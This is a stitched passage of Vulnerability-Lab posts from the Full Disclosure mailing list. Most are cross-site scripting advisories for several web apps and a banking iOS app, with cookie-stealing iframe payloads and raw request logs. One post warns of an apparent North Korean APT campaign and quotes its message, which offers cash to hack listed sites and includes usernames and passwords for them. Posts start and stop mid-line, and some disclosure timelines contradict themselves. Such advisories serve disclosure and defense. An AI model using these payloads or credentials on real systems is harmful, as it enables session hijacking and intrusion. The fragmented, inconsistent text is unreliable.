Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple non-persistent cross site vulnerabilities has been discovered in the 
official uDoctorAppointment v2.1.1 script web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with non-persistent attack vector to compromise browser
to web-application requests from the client-side.

The cross site security web vulnerabilities are located in the `created_at`, 
`created_date` and `sent_at` parameters of the `filter` web module.
The injection point is located in the parameters and the execution occurs in 
the filter module. The request method to inject the malicious script
code is GET and the attack vector of the vulnerability is non-persistent on 
client-side.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application 
modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./doctorReviews/doctorReviews
[+] ./orders/orders
[+] /mailingLog/manage
[+] /orders/doctorsManage
[+] /news/manage
[+] /newsSubscribers/manage
[+] /doctorReviews/manage/status/approved
[+] /appointments/manage

Vulnerable Parameter(s):
[+] created_at
[+] created_date
[+] sent_at
[+] appointment_date

Affected Module(s):
[+] Filter


Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerabilities can be exploited by 
remote attackers without account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


Exploitation: Payload
">%20


Role: Patient (Frontend - created_at)
https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=2021-09-08&but_filter=Filter
-
https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter


Role: Doctor (Frontend - created_date)
https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=2021-09-08&status=2&but_filter=Filter
-
https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=2&but_filter=Filter


Role: Admin (Backend -
https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=2021-09-01&status=0&but_filter=Filter
https://doctor-appointme

[FD] Rocket LMS v1.1 - (History) Persistent XSS Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Rocket LMS v1.1 - (History) Persistent XSS Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2305


Release Date:
=
2021-12-29


Vulnerability Laboratory ID (VL-ID):

2305


Common Vulnerability Scoring System:

5.4


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Rocket LMS is an online course marketplace with a pile of features that helps 
you to run your online education business easily.
This product helps instructors and students to get in touch together and share 
knowledge. Instructors will be able to create
unlimited video courses, live classes, text courses, projects, quizzes, files, 
etc and students will be able to use the
educational material and increase their skill level. Rocket LMS is based on 
real business needs, cultural differences,
advanced user researches so the product covers your business requirements 
efficiently.

(Copy of the Homepage:https://lms.rocket-soft.org/  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site scripting web vulnerability in the Rocket LMS v1.1 cms.


Affected Product(s):

Rocketsoft
Product: Rocket LMS v1.1 - eLearning Platform CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-12-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in the 
official Rocket LMS v1.1 cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise
browser to web-application requests from the application-side.

The vulnerability is located in the support ticket message body. The message 
body does not sanitize the input of message.
Remote attackers with low privileged application user accounts are able to 
inject own malicious script code with persistent
attack vector. The request method to inject is post. After the inject the 
message a displayed again for the user and the
backend for the support (admin). The issue can be exploited by organization, 
student and instructor account roles.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected 
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] conversations Support - New Ticket

Vulnerable Input(s):
[+] Subject

Vulnerable Parameter(s):
[+] title

Affected Module(s):
[+] Messages History


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


PoC: Payload



--- PoC Session Logs (POST) ---
https://lms.rocket-soft.org/panel/support/store
Host: lms.rocket-soft.org
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Origin:https://lms.rocket-soft.org
Connection: keep-alive
Referer:https://lms.rocket-soft.org/panel/support/new
Cookie: 
webinar_session=eyJpdiI6ImNUeG9hcmFEbXFUSGxZd0NOZ3J6R0E9PSIsInZhbHVlIjoiWXFSOGRXYWFHcUUvc0VuNUpzanhBZjdBc21lRy8xaEhTU0hQTnk2YWlJM1ZHYkxXdzc3
T3U2Nm9yMEI3b2o2QmtCT2NjdEkyRVNwdlhWUjgwY0ZHWkNyVHJSdnBCck8vVWo4MFVsK2JvLzRDUm1BRm5zU2Y0SWZWdGR1b29keWwiLCJtYWMiOiIxODI3NDQ2OTcxZDMwNjA0M2U0
OGM3YzZmNmMzM2Y1OTk5ZTNiZTIzY2E2ZGQxMTlkYzY2YzY0Y2M5OTI5MTc5In0%3D; 
TawkConnectionTime=0; __tawkuuid=e::lms.rocket-soft.org::W9t6jOO76CukDtw
wAughTc4sTzqsd2xAqZJpiyabjsp3sI9le/SuCBxWz7ekNzR0::2; 
remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6Ik9iUEZFNlZBYjJSOEVjSE1hRlNiZFE9PSIsInZhbHVlIjoiR3F1RWFsb01KREQ2K05FaG5MT1

[FD] Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2281


Release Date:
=
2022-01-05


Vulnerability Laboratory ID (VL-ID):

2281


Common Vulnerability Scoring System:

5.1


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Affiliate Pro is a Powerful and yet simple to use PHP affiliate Management 
System for your new or existing website. Let affiliates
sell your products, bring you traffic or even leads and reward them with a 
commission. More importantly, use Affiliate Pro to track
it intelligently to keep your affiliates happy and also your bottom line! So 
how does it work? It is pretty simple, when a user visits
your website through an affiliate URL the responsible affiliate sending the 
traffic to you will receive a commission based on your settings.

(Copy of the Homepage:https://jdwebdesigner.com/  
&https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 
 )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple reflected 
cross site scripting web vulnerabilities in the  Affiliate Pro - Affiliate 
Management System v1.7.


Affected Product(s):

jdwebdesigner
Product: Affiliate Pro v1.7 - Affiliate Management System (PHP) 
(Web-Application)


Vulnerability Disclosure Timeline:
==
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-08-30: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Guest Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple reflected cross site scripting web vulnerabilities has been discovered 
in the Affiliate Pro - Affiliate Management System v1.7.
The vulnerability allows remote attackers to inject own malicious script codes 
with non-persistent attack vector to compromise client-site
browser to web-application requests.

The non-persistent cross site scripting web vulnerabilities are located in the 
`email`,`username` and `fullname` parameters of the `index` module.
Attackers are able to inject own malicious script code to the 
`Fullname`,`Username` or `Email` input fields to manipulate client-side 
requests.
The request method to inject is post and the attack vector is non-persistent 
(reflected) on client-side. The injection- and execution points are
located in the index formular for affiliates to enter.

Successful exploitation of the vulnerabilities results in session hijacking, 
non-persistent phishing attacks, non-persistent external redirects to
malicious source and non-persistent manipulation of affected application 
modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] index

Vulnerable Input(s):
[+] Email
[+] Username
[+] Fullname

Vulnerable Parameter(s):
[+] email
[+] username
[+] fullname


Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerability can be exploited by 
remote attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site scripting web 
vulnerability follow the provided information and steps below to continue.


Exploitation: Payload

%3cscript%3ealert(1337)%3c%2fscript%3


--- PoC Session Logs (POST) ---
POST /affiliate-pro-demo/index HTTP/1.1
Host: affiliates-pro.localhost:8000
Origin:http://affiliates-pro.localhost:8000
Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24
Referer:http://affiliates-pro.localhost:8000/affiliate-pro-demo/
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
-
fullname=
&username=@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv
&p=test&confirmpwd=j2B%21p5o%21K8
-
HTTP/1.1 200 OK
Server: Apache
Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/; HttpOnly
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 6549
Content-Type: text/html; charset=UTF-8


Vulnerable Source: Index

Full Name

" required="required">



Username

" required>



E-Mail Address

" required>



Security Risk:

[FD] Banco Guayaquil v8.0.0 iOS - Cross Site Scripting Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Banco Guayaquil v8.0.0 iOS - Cross Site Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2315


Release Date:
=
2022-01-21


Vulnerability Laboratory ID (VL-ID):

2315


Common Vulnerability Scoring System:

4.6


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Official application of Banco Guayaquil to manage your finances your products 
with Banco Guayaquil, Make transactions
from your accounts, Pay credit cards, loans and services as well as access your 
movements, Deposit checks, Request
checkbooks, block cards, activate or deactivate consumption of the Internet and 
much more.

(Copy of the Homepage:https://apps.apple.com/ec/app/banco-guayaquil/id624963066)


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a persistent 
cross site web vulnerability in the official Banco Guayaquil 8.0.0 mobile ios 
app.


Affected Product(s):

Banco de Guayaquil
Product: Banco Guayaquil v8.0.0 - Apple iOS (Web-Application)


Vulnerability Disclosure Timeline:
==
2022-01-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

An application-side input validation  vulnerability has been discovered in the 
official Banco Guayaquil 8.0.0 mobile ios application.
The vulnerability allows a local attacker to inject own script code as payload 
to the application-side of the vulnerable service
function or module. The vulnerability is located in the TextBox Name Profile 
input. The code executes after input on any review
after the application start. The attack vector of the vulnerability is 
persistent and the request method to inject is POST.

Request Method(s):
[+] Import

Vulnerable Module(s):
[+] Add Name

Vulnerable Parameter(s):
[+] TextBox Name Profile

Vulnerable Final(s):
[+] Save Profile


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by local 
attackers with system user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow 
the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install the ios application to your ios device 
(https://apps.apple.com/ec/app/banco-guayaquil/id624963066)
2. Add new name as profile with the script code payload in the TextBox Name 
input
3. Save Profile via submit
4. Close mobile application to restart
5. Open mobile ios aplication again
6. Now the context executes directly on review without interaction
7. Successful reproduce of the persistent web vulnerability!


Proof of Concept (IMAGES):
https://i.imgur.com/Cc1VFUf.png
https://i.imgur.com/r1HWwrs.png


Proof of Concept (VIDEO):
https://imgur.com/a/lQHt1br

Payload: Cross Site Scripting
Use Breaks JS Context: ,javascript:alert, 
text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg


Solution - Fix & Patch:
===
The vulnerability can be resolved by a encode and secure parse / escape of the 
inputs.
In a second step the output location were the execute occurs needs to be 
sanitized.


Security Risk:
==
The security risk of the persistent validation web vulnerability in the mobile 
ios web-application is estimated as medium.


Credits & Authors:
==
Taurus Omar -https://www.vulnerability-lab.com/show.php?user=TaurusOmar


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been 
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or 
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databa

[FD] Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2275


Release Date:
=
2022-01-12


Vulnerability Laboratory ID (VL-ID):

2275


Common Vulnerability Scoring System:

5.2


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Build powerful and stunning websites. Whether you need an advanced corporate 
website, a powerful landing page, a professionnal blog or
an event website, all the tools to make creative digital experiences are at 
your fingertips with Ametys. No coding skills needed.
Ametys make it easy for everyone to create and manage unified digital platform. 
Ametys delivers simple and intuitive interface with
a familiar ribbon Office style interface.

(Copy of the 
Homepage:https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html
  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent input 
validation web vulnerability in the Ametys v4.4.1 cms web-application.


Affected Product(s):

Ametys
Product: Ametys v4.4.1 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent script code injection web vulnerability has been discovered in the 
official Ametys v4.4.1 cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise
browser to web-application requests from the application-side.

The vulnerability is located in the input fields of the link text, small 
description and description in the add external link function.
The function is for example located in the link directory of the backend. Added 
links are listed with status and details.
Attackers with low privileges are able to add own malformed link with malicious 
script code in the marked vulnerable parameters.
After the inject the links are being displayed in the backend were the execute 
takes place on preview of the main link directory.
The attack vector of the vulnerability is persistent and the request method to 
inject is post.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Link Directory (Add)

Vulnerable Function(s):
[+] add (External Link)

Vulnerable Parameter(s):
[+] Link Text
[+] Small description
[+] Description

Affected Module(s):
[+] Frontend (Main Link Listing)
[+] Backend (Link Directory)


Proof of Concept (PoC):
===
The persistent web vulnerability can be exploited by remote attackers with low 
privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the application path and login to the service as restricted user that 
allowed to create links
2. Open the link directory and create a new link (top|left)
3. Inject the test payloads to the link text, small description and description 
and save via post
4. On visit of the link directory the payloads executes in the backend listing 
or frontend
5. Successful reproduce of the persistent web vulnerability!


Payload(s):
poc_link
poc_link


Vulnerable Source:  Link Directory - Link (Add)
class="x-grid-cell-inner " style="text-align:left;"
poc_linkpoc_link  

test.deNormal


--- PoC Session Logs (POST) ---
https://ametys.localhost:8000.localhost:8000/cms/plugins/core-ui/servercomm/messages.xml
Host: ametys.localhost:8000.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 
Firefox/90.0
Accept: */*
Accept-Language: de,en-

[FD] uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2289


Release Date:
=
2022-01-21


Vulnerability Laboratory ID (VL-ID):

2289


Common Vulnerability Scoring System:

5.4


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
uBidAuction is a powerful, scalable & fully-featured classic and bid auction 
software that lets create the ultimate
profitable online auctions website. It allows to manage entire online auction 
operation: create new auctions within
seconds, view members auctions and use the auction extension settings tool.

(Copy of the 
Homepage:https://www.apphp.com/codemarket/items/48/ubidauction-php-classic-and-bid-auctions-script
  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple 
non-persistent cross site web vulnerabilities in the uBidAuction v2.0.1 script 
web-application.


Affected Product(s):

ApPHP
Product: uBidAuction v2.0.1 - Auction Script (PHP) (Web-Application)
Product: ApPHP MVC Framework v1.2.2 (Framework)


Vulnerability Disclosure Timeline:
==
2022-09-01: Researcher Notification & Coordination (Security Researcher)
2022-09-02: Vendor Notification (Security Department)
2022-09-07: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-01-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple non-persistent cross site web vulnerabilities has been discovered in 
the official uBidAuction v2.0.1 script web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with non-persistent attack vector to compromise browser
to web-application requests from the client-side.

The cross site web vulnerabilities are located in the `date_created`, 
`date_from`, `date_to` and `created_at` parameters of the `filter` web module.
The injection point is located in the parameters and the execution occurs in 
the filter module. The request method to inject the malicious script
code is GET and the attack vector of the vulnerability is non-persistent on 
client-side.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application 
modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./orders/myOrders
[+] ./auctions/myAuctions/status/active
[+] ./auctions/myAuctions/status/loose
[+] ./posts/manage
[+] ./news/manage
[+] ./tickets/manage
[+] ./auctions/manage
[+] ./backend/mailingLog/manage

Vulnerable Parameter(s):
[+] date_created
[+] date_from
[+] date_to
[+] created_at

Affected Module(s):
[+] Filter


Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerabilities can be exploited by 
remote attackers without account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


Exploitation: Payload
">


Exploitation: PoC (Role: Member)
https://bid-auction.localhost:8080/orders/myOrders?order_number=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&status=0&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from=";>https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_

[FD] North Korean APT Attacks Security Researchers in Social Media 2022

[i...@vulnerability-lab.com]

Hallo Security Researchers,

our independent vulnerability laboratory team would like to inform the 
public security research community & whitehats about an incident with 
the north korean apt targeting security researchers.


Due to today a new campagne started by the north korean apt in 
connection to some indian affiliates. The campagne targets only security 
researchers in social media. In the most cases the researcher receives a 
request and then a private message or the message is directly send to 
his managing pages multiple times.


In the message is the following text included:


--- English Version
I am a criminal data collection company representing Chinese law 
enforcement agencies. These fraudulent sites are deceiving many people 
in China. I need to bring the data to China to sue the site owner. 
Chinese law enforcement agencies have no law enforcement powers where 
the servers of this website are located. Therefore, we can only turn to 
foreign hackers for help at a high cost.


Crack the database management authority of the website and download me 
all the data in the database. You will receive the payment in USDT after 
I receive the data verification.


--- German Version
Ich bin ein kriminelles Datenerfassungsunternehmen, das chinesische 
Strafverfolgungsbehörden vertritt.
Diese betrügerischen Seiten täuschen viele Menschen in China. Ich muss 
die Daten nach China bringen, um den Website-Eigentümer zu verklagen.
 Chinesische Strafverfolgungsbehörden haben dort, wo sich die Server 
dieser Website befinden, keine Strafverfolgungsbefugnisse.
Daher können wir uns nur zu hohen Kosten an ausländische Hacker wenden, 
um Hilfe zu erhalten.


Knacken Sie die Datenbankverwaltungsautorität der Website und laden Sie 
mir alle Daten in der Datenbank herunter.
Sie erhalten die Zahlung in USDT, nachdem ich die Datenüberprüfung 
erhalten habe.



1：30,000 USDT
https://gec.green-entrepreneurship.cc/login_zh.html?0.8208984571383173
username：15289618853
password：qq308830


2：30,000 USDT
https://www.cegdex.com/downloadMobile.html
username：asdfhuhu
password：asdfhuhu
transaction password：852369
Phone number：+12098746325
SMS verification code platform：https://mianfeijiema.com/sms/12098746325


3：40,000 USDT
http://ahcprotect.com
username：DD3645450
password：33

http://www.ahcgoods.com
username：DD1357619
password：33


4:200,000 USDT
https://www.youlucky.biz/



After that text the apt lists in the message all targets they want to 
infiltrate or heist. The main target are the olympia service of a 
provider. the second targets are financial motivated in connection with 
sms verification bypass. This is mainly used to heist crypto currency or 
finanial platforms.


The impact of the attack doesn't show yet what are there targets because 
this is high espionage tactic. The apt searched for pro hackers and 
researcher with high level of reputation on social media.


1. The attackers want to compromise the researcher by extortion or ident 
compromise


2. The attackers want that the hackers and researcher community to 
attack the targets listed below without any purpose as a service. Means 
you just do they just informed you to high up traffic or to hide there 
traces.


3. They are really asking for this service to receive access to olympia 
service data or to financial services they already gained access and 
need to bypass specific mechanism like sms verification.


The motivation and the impact of the attack is not clearly visible ... 
we would like to inform everybody about it via mailing list to be aware 
about the north korean apt.


Risks that come along with the attack:
Phishing (Links, Sites & Emails)
Downgrade Attacks (Redirect & SSL Downgrade)
Malware Infection (2021 Q1 NET DLL Malware)
Identity Compromise (2021 Security Researchers)
Exploit Development (2021 Chrome Scenario)
Attacks against 3rd Party Service (Chain Exploitation)

Pictures:
https://ibb.co/1ffY1vb
https://ibb.co/9cmhD3z
https://ibb.co/3YVmMXX
https://ibb.co/m6s4R2G
https://ibb.co/XJSsWDG
https://ibb.co/JcDTDZ7

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE



OpenPGP_signature
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Car Portal Template - (Search) Persistent Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Car Portal Template - (Search) Persistent Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2299


Release Date:
=
2022-02-08


Vulnerability Laboratory ID (VL-ID):

2299


Common Vulnerability Scoring System:

5.6


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Advanced web solution for creating multi-user car classifieds and auto portal 
websites. The software has many different features
for both the administrators to manage the sites and for the users like 
functionality for the car dealers to create and manage
their own micro site, email alerts in order to notify the users when new cars 
meeting their search criteria are listed, save the
car listings, recommend them to friends, share the listings on the social 
networks, multi-language support and many others.

(Copy of the Homepage:https://www.netartmedia.net/pricing#car-portal  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a non persistent 
post inject vulnerability in the Car Portal Template PHP Script.


Affected Product(s):

NetArt Media
Product: Car Portal Template PHP Script (v2021) - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-02-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A non-persistent post inject web vulnerability has been discovered in the 
official Car Portal Template PHP Script.
The vulnerability allows remote attackers to inject malicious script code in 
post method requests to compromise user
session data or to manipulate application contents for clients.

The cross site scripting web vulnerability is located in the `username`, 
`user_first_name`, `user_last_name`, `variant`,
`power`, and `milage` parameters of the `index search` module. Remote attackers 
without privileged access are able to
inject own malicious script code in the search input field of the index module 
post method request. The execution takes
place in the results page of the search after submit via post.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of 
affected application modules.

Request method(s):
[+] POST

Vulnerable File(s):
[+] index.php

Vulnerable Input(s):
[+] Trim
[+] Power
[+] Milage
[+] First name
[+] Last name
[+] Username

Vulnerable Parameter(s):
[+] username
[+] user_first_name
[+] user_last_name
[+] variant
[+] power
[+] milage


Proof of Concept (PoC):
===
The client-side post inject web vulnerability can be exploited by remote 
attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


--- PoC Session Logs (POST) ---
https://car-portal-template.localhost:8080/cars2/index.php
Host: car-portal-template.localhost:8080
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 878
Origin:https://car-portal-template.localhost:8080
Connection: keep-alive
Referer:https://car-portal-template.localhost:8080/cars2/index.php
Cookie: language=en; PHPSESSID=23d238178bfb19f9bd93f25f1b465822
ad_type=&selected_package=0&property_type=1,1&property_zip=&price=,&mod=sell&lang=en&Step=2¤t_type=1
&type=1&username=">&password=">
&user_first_name=">&user_last_name=">
&user_email=t...@aol.de&user_phone=&car_make=Aixam&car_model=505&variant=">
&year=2004&location1=18&location2=-1&level_location=&post_location=18
&power=">&mileage=">
&transmission=M_MANUAL&fuel_type=M_PETROL&exterior_color=M_WHITE&description=
-
POST: HTTP/2.0 200 OK
server: Apache
set-cookie: language=en; expires=Tue; Max-Age=31536000
vary: Accept-Encoding
content-encoding: gzip
content-length: 6974
content-t

[FD] Wordpress v5.9 - Reflected Cross Site Scripting Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Wordpress v5.9 - Reflected Cross Site Scripting Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2316


Release Date:
=
2022-02-09


Vulnerability Laboratory ID (VL-ID):

2316


Common Vulnerability Scoring System:

4.2


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
WordPress (WP, WordPress.org) is a free and open-source content management 
system (CMS) written in PHP and paired
with a MySQL or MariaDB database. Features include a plugin architecture and a 
template system, referred to within
WordPress as Themes. WordPress was originally created as a blog-publishing 
system but has evolved to support other
web content types including more traditional mailing lists and forums, media 
galleries, membership sites, learning
management systems (LMS) and online stores. One of the most popular content 
management system solutions in use,
WordPress is used by 42.8% of the top 10 million websites as of October 2021.

(Copy of the Homepage: wikipedia.com)


Abstract Advisory Information:
==
An independent vulnerability  researcher discovered a reflected cross site web 
vulnerability in the official Wordpress v5.9 framework.


Affected Product(s):

Wordpress.org
Product: Wordpress v5.9 - Blog (PHP) (Web-Application)


Vulnerability Disclosure Timeline:
==
2022-02-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Moderator Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

The reflected xss can be exploited when a user with the AUTHOR or CONTRIBUTOR 
role adds a javascript
payload in the Post's Excerpt function, whenever a user wants to use the Add 
Block function in their post
or page, the xss will be executed. Also the post and page editor allows 
executing the xss payload
directly just by copying and pasting the malicious javascript.


Proof of Concept (PoC):
===
